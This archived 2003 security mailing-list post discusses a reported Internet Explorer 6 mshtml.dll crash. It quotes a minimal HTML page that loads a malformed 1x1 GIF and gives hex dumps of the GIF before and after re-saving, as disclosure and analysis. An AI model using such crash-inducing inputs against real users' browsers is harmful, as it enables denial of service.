[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <20030902173807.GA409@sentinelchicken.org>
From: tim-security at sentinelchicken.org (Tim)
Subject: New Microsoft Internet Explorer mshtml.dll Denial of Service?
Interesting...
> After a **lot** of html code "trimming" I came with an offline version of
> the page like this:
>
> ------------------------------------------------------
> <html>
> <body>
> <table border="0" cellspacing="0" cellpadding="0">
> <tr>
> <td><img src="http://www.galad.com/frame/e1x1.gif" width="1" height="1"
> alt=""></td>
> </tr>
> </table>
> </body>
> </html>
> -------------------------------------------------------
>
> and this piece of code does crash my browser (6.0.2800.1106)
> on windows 2000 server all patches and fixes up to date.
>
> NOTE: Every time you **want** the browser to crash, you must delete it from
> the "Temporary Internet Files" before loading it in your browser.
>
> Although this image (e1x1.gif) is 1x1 GIF, ACDSee Classic calls it a "Bad or
> unrecognized image header".
> Does this image, in some way, affects the way IE does the parsing?
> Seems like it...
Yeah, the GIF image is almost certainly mal-formed. Not sure in what
way yet, as I am no GIF expert. Some interesting information though:
Opening it in the GIMP produces the following errors on stderr:
GIF: too much input data, ignoring extra...
GIF: bogus character 0x00, ignoring
The file's contents are:
00000000 47 49 46 38 39 61 01 00 01 00 80 00 00 FF FF FF GIF89a..........
00000010 FF FF FF 21 F9 04 01 00 00 01 00 2C 00 00 00 00 ...!.......,....
00000020 01 00 01 00 00 02 02 4C 01 00 3B .......L..;
I then opened the file in the GIMP, and immediately saved it back to
another gif file, and it wrote:
00000000 47 49 46 38 39 61 01 00 01 00 80 00 00 FF FF FF GIF89a..........
00000010 00 00 00 21 F9 04 01 00 00 00 00 2C 00 00 00 00 ...!.......,....
00000020 01 00 01 00 00 00 01 01 00 3B .........;
Which obviously has some differences. Anyone else better with GIF89a
than I?
tim
Powered by blists - more mailing lists